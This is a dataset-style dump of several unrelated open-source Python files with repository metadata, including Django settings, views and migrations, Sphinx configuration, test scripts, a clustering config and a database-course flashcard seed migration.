'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'aquaara.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'aquaara.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
# {
# 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
# },
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'pt-br'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_ROOT = '../static/'
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
'static/',
]
AUTH_USER_MODEL = 'users.User'
LOGIN_URL = 'login'
LOGOUT_URL = 'logout'
LOGIN_REDIRECT_URL = 'property_list'
LOGOUT_REDIRECT_URL = 'login'
try:
from local_settings import *
except ImportError:
pass
|
[
"samuelsas.samuel18@gmail.com"
] |
samuelsas.samuel18@gmail.com
|
9ef14bf76e360aeb512485962327cc1cc8cd093f
|
7616b18f708dbced335db0b93b736bdf6445cbce
|
/test.py
|
15a2b070abf0028c0018ccb5274d6b95ca0e13a8
|
[] |
no_license
|
jireland88/percolation
|
311d43a652624d29e1f683ef3f4d418238496808
|
d0de18b9aafd6a055be35be7de32a50e5ca0832f
|
refs/heads/main
| 2023-05-01T00:08:21.135928
| 2021-05-16T22:44:09
| 2021-05-16T22:44:09
| 361,247,692
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 222
|
py
|
from percolation import *
from path_helpers import *
from path_finders import *
iters = 50
P_05 = Percolation(np.zeros((5, 5)), RecPathFinder(TriangleNeighbours()))
PT = PercolationTools(P_05)
PT.plot_centre_prob(50, 1)
|
[
"jakeireland88@protonmail.com"
] |
jakeireland88@protonmail.com
|
19c4b0d54104cd06b5b95603cea72a1da9812988
|
a3e09d68b73f3090c240920073bf285ce1ee0238
|
/docs/source/conf.py
|
649e6ddeba86419a555adef0d981dcad6450b24b
|
[
"MIT"
] |
permissive
|
rmorshea/jotting
|
8750fc044c898c96e25b6acda4eadd0f57726cee
|
bad834f6bec1af049cabd1a4dc10504ea849de03
|
refs/heads/master
| 2021-09-20T08:28:23.465095
| 2018-03-04T02:06:30
| 2018-03-04T02:06:30
| 109,722,665
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,563
|
py
|
# -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/stable/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'Jotting'
copyright = '2018, Ryan Morshead'
author = 'Ryan Morshead'
# The short X.Y version
version = ''
# The full version, including alpha/beta/rc tags
release = '0.2.1'
import os
import sys
sys.path.insert(0, os.path.dirname(os.path.abspath('..')))
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'sphinx.ext.autosummary',
'sphinxcontrib.napoleon',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['.templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'manni'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
import sphinx_materialdesign_theme
html_theme = 'sphinx_materialdesign_theme'
html_theme_options = {
# Specify a list of menu in Header.
# Tuples forms:
# ('Name', 'external url or path of pages in the document', boolean, 'icon name')
#
# Third argument:
# True indicates an external link.
# False indicates path of pages in the document.
#
# Fourth argument:
# Specify the icon name.
# For details see link.
# https://material.io/icons/
'header_links' : [
('Home', 'index', False, 'home'),
("GitHub", "https://github.com/rmorshea/jotting", True, 'link')
],
# Customize css colors.
# For details see link.
# https://getmdl.io/customize/index.html
#
# Values: amber, blue, brown, cyan deep_orange, deep_purple, green, grey, indigo, light_blue,
# light_green, lime, orange, pink, purple, red, teal, yellow(Default: indigo)
'primary_color': 'blue',
# Values: Same as primary_color. (Default: pink)
'accent_color': 'deep_purple',
# Customize layout.
# For details see link.
# https://getmdl.io/components/index.html#layout-section
'fixed_drawer': True,
'fixed_header': True,
'header_waterfall': True,
'header_scroll': False,
# Render title in header.
# Values: True, False (Default: False)
'show_header_title': False,
# Render title in drawer.
# Values: True, False (Default: True)
'show_drawer_title': True,
# Render footer.
# Values: True, False (Default: True)
'show_footer': True
}
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['.static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'jottingdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'jotting.tex', 'Jotting Documentation',
'Ryan Morshead', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'Jotting', 'Jotting Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Jotting', 'Jotting Documentation',
author, 'Jotting', 'One line description of project.',
'Miscellaneous'),
]
# -- Extension configuration -------------------------------------------------
|
[
"ryan.morshead@gmail.com"
] |
ryan.morshead@gmail.com
|
d10be5267e00090902d64733b7fc541f9f2561ef
|
ae596ab3ea6acca7265c2043aef0a9b9558f12b0
|
/Django/django-ex 3.0.2/ZTraining/F/views.py
|
71ac645374609770bcb9005e19c4d071dff77ea0
|
[] |
no_license
|
LexusLight/PythonLearn
|
4013edf7b83aec7ab63d54c39617272c43eee584
|
1b62c28d4619f757e0d3691e444d61d69cc3c91f
|
refs/heads/master
| 2021-09-08T20:00:41.696775
| 2021-09-01T22:39:23
| 2021-09-01T22:39:23
| 192,084,614
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,658
|
py
|
from django.shortcuts import render
from django.http import HttpResponseRedirect,HttpResponse,HttpResponsePermanentRedirect, HttpRequest
from django.views.generic import View #Для создания класса
from .models import User, Message
from .forms import UserForm
# Create your views here.
def reg(request):
# if request.COOKIES is not None:
# x = request.COOKIES.get("x")
# else:
# x = 2
# x = 2
if 'x' in request.session and 'username' in request.session:
x = request.session['x']
else:
x = 2
if(x == 1):
username = request.session['username']
user = User.objects.get(username = username)
return render(request, 'user.html', {"user":user})
elif(x == 2):
form = UserForm()
return render(request, 'reg.html', {"form":form})
def exit(request):
resp = HttpResponsePermanentRedirect('/C')
# resp.set_cookie('x',2)
del request.session['x']
request.session['x'] = 2
del request.session['username']
return resp
class RegObr(View):
def post(self,request):
form = UserForm(self.request.POST)
if form.is_valid():
user = User(username = form.cleaned_data['username'],realname = form.cleaned_data['realname'])
user.save()
resp = HttpResponseRedirect('/C') #Задаём куки. Пока не работает.
# resp.set_cookie('x',1,max_age=10000)
request.session['x'] = 1
request.session['username'] = form.cleaned_data['username']
return resp
else:
return HttpResponseRedirect('/C')
|
[
"kostyaelizarov@mail.ru"
] |
kostyaelizarov@mail.ru
|
c975b1b26eec3465191ab42aad5a295e15539372
|
3cb8680bdf40e36a60952691f14a46c7ab912c74
|
/Map/migrations/0001_initial.py
|
b70afdfc3ed7271a2efef301b84e1e946a07c345
|
[] |
no_license
|
MichaelMa2014/CivilAviation
|
3a81a4f5a281de3fc10fc0aa2f1c70f17dd0cf7b
|
e7ec921b589f10c6dcd340e0eff249e3878ffd76
|
refs/heads/master
| 2021-06-11T19:28:45.400398
| 2017-03-04T02:58:59
| 2017-03-04T02:58:59
| 64,899,037
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,676
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-22 17:50
from __future__ import unicode_literals
import Map.models
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Record',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('airline_code2', models.TextField()),
('lon', models.FloatField()),
('_id', models.TextField()),
('airport_icao_code', models.TextField()),
('num5', models.IntegerField()),
('typecode', models.TextField()),
('first_in', models.FloatField()),
('airline_code1', models.TextField()),
('lat', models.FloatField()),
('flight', models.TextField()),
('height', models.IntegerField()),
('num3', models.IntegerField()),
('airport_dep', models.TextField()),
('timestamp', models.TextField()),
('idshex', models.TextField()),
('str1', models.TextField()),
('num2', models.IntegerField()),
('last_modify', models.FloatField()),
('zone_range', Map.models.ListField(default=[])),
('airport_arr', models.TextField()),
('num1', models.IntegerField()),
('num4', models.IntegerField()),
('fid', models.TextField()),
],
),
]
|
[
"ljl_buaa@126.com"
] |
ljl_buaa@126.com
|
625c33aedcdbc5998354b305955b42568c3b3411
|
caceb60f71165772b6d6155f619e79189e7c80a9
|
/第一期/杭州-冬/第二次任务/iter_eg.py
|
03278430ce85f5d7610e38e2ec3e82ebd219e29e
|
[
"Apache-2.0"
] |
permissive
|
beidou9313/deeptest
|
ff41999bb3eb5081cdc8d7523587d7bc11be5fea
|
e046cdd35bd63e9430416ea6954b1aaef4bc50d5
|
refs/heads/master
| 2021-04-26T23:06:08.890071
| 2019-04-03T02:18:44
| 2019-04-03T02:18:44
| 123,931,080
| 0
| 0
|
Apache-2.0
| 2018-03-05T14:25:54
| 2018-03-05T14:25:53
| null |
UTF-8
|
Python
| false
| false
| 1,487
|
py
|
#--coding:utf-8--
#迭代含义:可以通过for in循环来从头至尾循环访问其中元素的形式 就叫迭代。 可用于迭代的对象常叫 可迭代对象。所谓遍历 就是访问其中每个元素
## 用instance()判断目标对象是否为某种类型.这里判断是否为 可迭代对象
from collections import Iterable
from collections import Iterator
list_1=[0,1,2]
print(isinstance(list_1,Iterable))
#判断是否为迭代器
print(isinstance(list_1,Iterator))
#迭代器:一个对象作为参数可以用于next()函数且返回下一个值的对象
#迭代器的两个基本方法 Iter() next() #其实我觉得这里叫函数更恰当
#如上list、str、tuple、dict等可用于for循环遍历 为可迭代对象但不是迭代器
##不过我们可以把可迭代对象 改造成迭代器 用iter()
it_list=iter(list_1)
#对改造完成的迭代器 上next()
print("iterator第一个元素 %d" % next(it_list))
print("iterator第二个元素 %d" % next(it_list))
print("iterator第三个元素 %d" % next(it_list))
#对于迭代器 仍然可用for in循环来一次性从头开始访问所有元素.
it_list=iter(list_1)
for i in it_list:
print(i)
#Iterable不一定是Iterator. Itrrator一定是Iterable
#Iterator可表示一个的数据结构--甚至无限大,但此时并没有事先就存储那么多的元素,保存
# 的只是计算方法,只有用next()才会计算出下一个数据并返回--注意是计算出,计算后也没有保存
|
[
"lw20140705@163.com"
] |
lw20140705@163.com
|
605e989d78c320d738acb3228b5b0603b16caddb
|
ce59a94a69b8fe3def1ff78960c5e2f0e39a722b
|
/scenes/plugins/scene_stretchgoals.py
|
8c24eed97969eb31d36629ef0c411150e81389c2
|
[
"Apache-2.0"
] |
permissive
|
pretix/pretix-screenshots
|
8503165edae82b4aedd0bccdc26e55d590114a97
|
5956ca3f8baf7ff38e59cb8f571134ce1bf2a6aa
|
refs/heads/master
| 2022-10-15T15:36:12.298581
| 2022-10-07T14:19:27
| 2022-10-07T14:19:27
| 98,909,158
| 15
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,253
|
py
|
import json
import random
import time
from datetime import timedelta
import pytest
from decimal import Decimal
from django.conf import settings
from django.utils.timezone import now
from django.utils.translation import gettext as _
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from pretix.base.models import Order, OrderPayment
from ..utils import screenshot
@pytest.mark.django_db
@pytest.mark.skipif(
'pretix_stretchgoals' not in settings.INSTALLED_APPS,
reason='Plugin not installed.'
)
def shot_stretchgoals(live_server, organizer, event, logged_in_client):
event.plugins += ',pretix_stretchgoals'
event.save()
eb = event.items.create(name=_('Early-bird ticket'), default_price=23, admission=True)
regular = event.items.create(name=_('Regular ticket'), default_price=26, admission=True)
event.settings.stretchgoals_items = '{},{}'.format(eb.pk, regular.pk)
event.settings.stretchgoals_chart_averages = True
event.settings.stretchgoals_chart_totals = True
event.settings.stretchgoals_is_public = True
event.settings.stretchgoals_goals = json.dumps([
{
'name': _('Break-even'),
'total': 10000,
'amount': 435,
'description': ''
},
{
'name': _('We can have a party'),
'total': 20000,
'amount': 435,
'description': ''
}
])
for day in range(30):
d = now() - timedelta(days=day)
order = event.orders.create(
status=Order.STATUS_PAID,
email='admin@localhost',
expires=now(),
datetime=d,
total=Decimal("23"),
locale='en'
)
order.payments.create(
provider='banktransfer',
amount=order.total,
payment_date=d,
state=OrderPayment.PAYMENT_STATE_CONFIRMED
)
num = max(0, random.randint(25, 45) - day)
for l in range(num):
if day > 15:
order.positions.create(
item=regular, price=Decimal('23.00')
)
else:
order.positions.create(
item=regular, price=Decimal('26.00')
)
logged_in_client.get(live_server.url + '/control/event/{}/{}/stretchgoals/settings/'.format(
organizer.slug, event.slug
))
screenshot(logged_in_client, 'plugins/stretchgoals/settings.png')
logged_in_client.get(live_server.url + '/control/event/{}/{}/stretchgoals/'.format(
organizer.slug, event.slug
))
WebDriverWait(logged_in_client, 10).until(
EC.presence_of_element_located((By.CSS_SELECTOR, "#avg_chart svg"))
)
time.sleep(.5)
screenshot(logged_in_client, 'plugins/stretchgoals/backend.png')
logged_in_client.get(live_server.url + '/{}/{}/stats/'.format(
organizer.slug, event.slug
))
WebDriverWait(logged_in_client, 10).until(
EC.presence_of_element_located((By.CSS_SELECTOR, "#avg_chart svg"))
)
time.sleep(.5)
screenshot(logged_in_client, 'plugins/stretchgoals/frontend.png')
|
[
"mail@raphaelmichel.de"
] |
mail@raphaelmichel.de
|
0882fcb47bebd1dc53eb867eef4cf8a6fec37fe4
|
4d8b3f23d6de766425d71264a854fd85569eb239
|
/generateConfig.py
|
6a136320f7cd7a3bb6f5ccfeace038dd1366d821
|
[
"MIT"
] |
permissive
|
BrendanHalley/infping
|
3f07a5178fed4531ce5076c6b7c8cd0a882b68c4
|
32c52befd7fce45c3d9a5dde1eb2af6a13c5a64e
|
refs/heads/master
| 2020-07-28T21:00:57.622546
| 2020-02-16T23:11:43
| 2020-02-16T23:11:43
| 209,536,587
| 0
| 0
|
MIT
| 2019-09-19T11:29:34
| 2019-09-19T11:29:34
| null |
UTF-8
|
Python
| false
| false
| 510
|
py
|
import urllib.request
import re
regex = r"(\[.*\].*\[(.*)\])"
url = 'https://raw.githubusercontent.com/jlu5/netmeter.club/confv2/Targets-Shared'
response = urllib.request.urlopen(url)
data = response.read()
text = data.decode('utf-8')
matches = re.finditer(regex, text, re.MULTILINE)
for matchNum, match in enumerate(matches, start=1):
print("[hosts."+match.groups()[1].replace(".", "_")+"]")
print("ip = \""+match.groups()[1]+"\"")
print("description = \""+match.groups()[0]+"\"")
print()
|
[
"bhalley@Brendans-MacBook-Pro.local"
] |
bhalley@Brendans-MacBook-Pro.local
|
c86b71c71ec2eedf029e8a7c177ed3564e14f23c
|
34ae7274b072b9eb84c0b94e99a1ee6b3bc2c926
|
/Python/Python_base/lesson_003/03_division.py
|
e47beabf5bcb72537f7edcfa585a0a01080ce937
|
[] |
no_license
|
Alister-uz/lessons
|
6541636b9432045e2859a8838441b2c4116aca53
|
6d4ead2f95f893e91a7ba75ccadaaec0caf3759b
|
refs/heads/master
| 2022-12-14T16:15:31.128064
| 2020-09-05T16:24:17
| 2020-09-05T16:24:17
| 289,890,393
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 763
|
py
|
# -*- coding: utf-8 -*-
# (цикл while)
# даны целые положительные числа a и b (a > b)
# Определить результат целочисленного деления a на b, с помощью цикла while,
# __НЕ__ используя ни одной из операций деления: ни деления с плавающей точкой /, ни целочисленного деления //
# и взятия остатка %
# Формат вывода:
# Целочисленное деление ХХХ на YYY дает ZZZ
a, b = 179, 37
whole, x = 0, a
while x >= b:
whole += 1
x -= b
print('Целочисленное деление', a, 'на', b, 'дает', whole)
# зачёт! 🚀
|
[
"khasankhodjaev@gmail.com"
] |
khasankhodjaev@gmail.com
|
6fb551cdb3e28ef196baa88670818bd52cc39b38
|
41adb4208413fe73ac43db4b427ad44f15bf8ea7
|
/python/vinicius/PC_MeanShift_simulated/sim_6/pc4/par_0.6/config.py
|
1acf9dc87c6b15d988039c673a8f5254e25759ac
|
[] |
no_license
|
emilleishida/MLSNeSpectra
|
daebb13307586e0450f32c87495dcf0ef3f59c10
|
182640f93b68722dbd4ca5e45916b849daa65da4
|
refs/heads/master
| 2016-09-15T17:01:09.570337
| 2015-12-08T16:17:25
| 2015-12-08T16:17:25
| 42,939,754
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,954
|
py
|
#####################################################################################
'''
Original data:
Used for the reduction,
not needed if doing clusreing only
'''
ORG_DATA = '/home/vinicius/MLSNeSpectra/python/SN_simulator/simulated_data/6/derivatives.dat'
#####################################################################################
'''
REDUCTION METHOD
possibilities:
-pca
The aditional parameters must be added with the same name
as in the original function plus the prefix REDUCTION_METHOD'_'.
Example:
if REDUCTION_METHOD is 'pca', the parameter
n_components must be declared as
pca_n_components= ...
if REDUCTION_METHOD is 'empca', the parameter
error_file can be declared as
empca_errors_file= ...
in order to run with weights=1/errors^2. Its default value is
None, so empca runs without weights
'''
REDUCTION_METHOD = 'pca'
pca_n_components = 4
#####################################################################################
'''
CLUSTERING METHOD
possibilities:
-MeanShift
-KMeans
-AffinityPropagation
-AgglomerativeClustering
-DBSCAN
The aditional parameters must be added with the same name
as in the original function plus the prefix CLUSTERING_METHOD'_'
Example:
if CLUSTERING_METHOD is 'MeanShift', the parameter
quantile must be declared as
MeanShift_quantile= ...
'''
CLUSTERING_METHOD = 'MeanShift'
MeanShift_quantile = 0.6
#####################################################################################
'''
CLUSTERING OUTPUT EXTENSIONS
extension of output plots produced by pylab
'''
PLOT_EXT = '.png'
PLOT_SPEC_EXT = '.pdf'
#####################################################################################
'''
QUALITY TEST METHODS
put one or more (as a vector) quality checks for clustering. possibilities are:
-silhouette_index
-Dunn_index
-DavisBouldin_index
-vrc
'''
QUALITY_METHODS=['silhouette_index','Dunn_index','DavisBouldin_index','vrc']
#####################################################################################
'''
CLUSTERING INPUT DATA
add this ONLY if you want to use a external data source for the clustering,
if you want to use the data from the pipeline leave it commented.
Be aware that this data will also go into the plotting.
'''
#REDUCED_DATA_EXTERNAL = '../empca_trained_coeff/coefficients.dat'
#####################################################################################
'''
PLOTTING INPUT DATA
add this ONLY if you want to use a external data source of the clusters for the plotting,
if you want to use the data from the pipeline leave it commented.
You can also add an external file with different label to set different colors
to the reduced data. The default color scheme is according to each parent cluster.
'''
#CLUSTERS_DATA_EXTERNAL = '../empca_trained_coeff/coefficients.dat'
#LABELS_DATA_EXTERNAL = '../empca_trained_coeff/coefficients.dat'
|
[
"viniciusbusti@gmail.com"
] |
viniciusbusti@gmail.com
|
fdd7f8ee95f616f5aa5372945a0110179f64cea7
|
4c499782655f8e929a5dd6b39d6c5d378fcfd7bd
|
/power_with_addition.py
|
1d4fa1bd5ca75f69b37dd4de46f043bd736e9f2f
|
[] |
no_license
|
IanCBrown/practice_questions
|
53a3fd66bee807f6e30e6d57632966f146c704c9
|
838b94c26cd3c26b76c3908277944a3b5f9bc7c7
|
refs/heads/master
| 2021-08-06T07:14:57.237709
| 2020-04-16T05:03:33
| 2020-04-16T05:03:33
| 149,521,025
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 216
|
py
|
def power(a, b):
if b == 0:
return 1
prev = a
total = a
for i in range(b - 1):
for j in range(a - 1):
total += a
prev = total
return total
print(power(5,3))
|
[
"icb0004@auburn.edu"
] |
icb0004@auburn.edu
|
947e7d0b2f584aa3d47e30ea9438057dd592df00
|
75dcb56e318688499bdab789262839e7f58bd4f6
|
/_algorithms_challenges/leetcode/lc-all-solutions/543.diameter-of-binary-tree/diameter-of-binary-tree.py
|
925bed2373395d7fcfc71f9d53c052df1004c1c8
|
[] |
no_license
|
syurskyi/Algorithms_and_Data_Structure
|
9a1f358577e51e89c862d0f93f373b7f20ddd261
|
929dde1723fb2f54870c8a9badc80fc23e8400d3
|
refs/heads/master
| 2023-02-22T17:55:55.453535
| 2022-12-23T03:15:00
| 2022-12-23T03:15:00
| 226,243,987
| 4
| 1
| null | 2023-02-07T21:01:45
| 2019-12-06T04:14:10
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 537
|
py
|
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def diameterOfBinaryTree(self, root):
"""
:type root: TreeNode
:rtype: int
"""
self.ans = 0
def dfs(root):
if not root:
return 0
left = dfs(root.left)
right = dfs(root.right)
self.ans = max(self.ans, left + right)
return max(left, right) + 1
dfs(root)
return self.ans
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
d5e07aa271294e9efcb13756857b8b1a8a51f9c5
|
b7864b7beb3567cfd84877f887958b67065cb58d
|
/mypractice/app/migrations/0002_new_database_course.py
|
87582416929397acbcfc5c097ca9402a2a313d4c
|
[] |
no_license
|
AliMalik9599/MyPractice
|
2d63710c35fe403a1be260acda031550487cc1e6
|
4175bfe92caa349e47025f3f1e72c98b5853a821
|
refs/heads/main
| 2023-03-10T05:13:54.851456
| 2020-12-21T13:46:53
| 2020-12-21T13:46:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,135
|
py
|
from django.db import migrations, models
from app.models import Course, Skill, Card
import datetime
schema = 'Answer the following question based on this schema: </br> branch(branch-name, branch-city, assets) </br> ' \
'customer(customer-name, customer-street, customer-city) </br> account(branch-name, account-number, balance) </br> ' \
'loan(branch-name, loan-number, amount) </br> depositor(customer-name, account-number) </br> borrower(customer-name,' \
' loan-number) </br>'
def add_mock_databases_course(apps, schema_editor):
d, created = Course.objects.get_or_create(name='Databases', description="An introduction to Databases in SQL.")
d.save()
relational_algebra, created = Skill.objects.get_or_create(name="Relational Algebra", course=d)
relational_algebra.save()
relational_calculus, created = Skill.objects.get_or_create(name="Relational Calculus", course=d)
relational_calculus.save()
sql, created = Skill.objects.get_or_create(name="SQL", course=d)
sql.save()
theory, created = Skill.objects.get_or_create(name="Theory", course=d)
theory.save()
c1, created = Card.objects.get_or_create(title='Project', course=d, skill=relational_algebra, level=1, duration=5, view_count=0, content='Symbol: PI </br> Notation: PI_a1,a2,...,ak(r) where a1, a2 are attributes of relation r </br> Result: The relation of k columns obtained by erasing the columns not listed')
c1.save()
c2, created = Card.objects.get_or_create(title='Union', course=d, skill=relational_algebra, level=1, duration=5, view_count=0, content='Symbol: U </br> Notation: r U s where s and r are relations with the same number of attributes, and the attributes are compatible </br> Result: r U s = {t| t is element of r OR t is element of s}')
c2.save()
c3, created = Card.objects.get_or_create(title='Select', course=d, skill=relational_algebra, level=3, duration=5, view_count=0, content='Symbol: SIGMA </br> Notation: SIGMA_p(r) where p is a formula with propositional calculus </br> Result: r = SIGMA_a=b and d > 5 where the rows selected have values for both b and d greater than 5')
c3.save()
c4, created = Card.objects.get_or_create(title='Set Difference', course=d, skill=relational_algebra, level=2, duration=5, view_count=0, content='Symbol: - </br> Notation: r - s where r and s are relations with compatible domains </br> Result: r - s = {t| t is element of r AND t is not an element of s}')
c4.save()
c5, created = Card.objects.get_or_create(title='Cartesian Product', course=d, skill=relational_algebra, level=1, duration=5, view_count=0, content='Symbol: X </br> Notation: r X s </br> Result: r X s = {tq| t is element of r AND q is element of s}')
c5.save()
c6, created = Card.objects.get_or_create(title='Set Intersection', course=d, skill=relational_algebra, level=3, duration=5, view_count=0, content='Symbol: INTERSECT </br> Notation: r INTERSECT s </br> Result: r INTERSECT s = {t| t is element of r AND t is element of s}')
c6.save()
c7, created = Card.objects.get_or_create(title='Natural Join', course=d, skill=relational_algebra, level=2, duration=5, view_count=0, content='Symbol: JOIN </br> Notation: r JOIN s where r = (A, B, C, D) and s = (E, B, D) </br> Result: PI_r.A, r.B, r.C, r.D, r.E(SIGMA_r.B=s.B, r.D=s.D(r X s))')
c7.save()
c8, created = Card.objects.get_or_create(title='Division', course=d, skill=relational_algebra, level=1, duration=5, view_count=0, content='Symbol: % </br> Notation: r % s </br> Result: Suited queries that include "for all" and yields a relation that includes all rows in r where one attribute matches every row in s')
c8.save()
c9, created = Card.objects.get_or_create(title='RC Practice Question 1', course=d, skill=relational_calculus, level=2, duration=15, view_count=0, content=schema+'</br> Using relational calculus, find the nnames of all customers having a loan, an account, or both at the bank.')
c9.save()
c10, created = Card.objects.get_or_create(title='RC Practice Question 2', course=d, skill=relational_calculus, level=2, duration=15, view_count=0, content=schema+'</br> Using relational calculus, find the branch-name, loan-number, and amount for loans of value over $1200.')
c10.save()
c11, created = Card.objects.get_or_create(title='RC Practice Question 3', course=d, skill=relational_calculus, level=2, duration=15, view_count=0, content=schema+'</br> Using relational calculus, find the names of all customers who have a loan at the Perryridge branch, but not account at any branch of the bank.')
c11.save()
c12, created = Card.objects.get_or_create(title='RC Practice Question 4', course=d, skill=relational_calculus, level=3, duration=15, view_count=0, content=schema+'</br> Using relational calculus, find the names of all customers having a loan from the Perryridge branch and the cities the live in.')
c12.save()
c13, created = Card.objects.get_or_create(title='The select clause', course=d, skill=sql, level=3, duration=5, view_count=0, content='The select clause corresponds to the projection operation in relational algebra. It is used to list the attributes desired in the result of a query. </br> Example: SELECT branch-name FROM loan')
c13.save()
c14, created = Card.objects.get_or_create(title='The where clause', course=d, skill=sql, level=4, duration=5, view_count=0, content='The where clause corresponds to the selection predicate of relational algebra. it consists of a predicate involving attributes of the relations that appear in the from clause. </br> Example: </br> SELECT loan-number </br> FROM loan </br> WHERE branch-name = "Perryridge" AND amount > 1200')
c14.save()
c15, created = Card.objects.get_or_create(title='The from clause', course=d, skill=sql, level=1, duration=5, view_count=0, content='The from clause corresponds to the cartesian product operation in relational algebra. It lists the relations to be scanned in the evaluation of the expression. </br> Example: </br> SELECT * </br> FROM borrower, loan')
c15.save()
c16, created = Card.objects.get_or_create(title='String operations', course=d, skill=sql, level=5, duration=5, view_count=0, content='SQL includes a string-matching operator for comparisons on character strings. Patterns are described using %, which matches any substring, and _, which matches any character. </br> Example: </br> SELECT customer-name </br> FROM customer </br> WHERE customer-name LIKE "%Main%" </br> finds all customers who life on a street containing the substring Main.')
c16.save()
c17, created = Card.objects.get_or_create(title='Ordering the display of tuples', course=d, skill=sql, level=3, duration=5, view_count=0, content='Ascending order is default, but "desc" can be used to reverse the order ("asc" for ascending). </br> Example: SELECT DISTINCT customer-name </br> FROM borrower, loan </br> WHERE borrower.loan-number = loan.loan.number AND branch-name = "Perryridge" </br> ORDER BY customer-name')
c17.save()
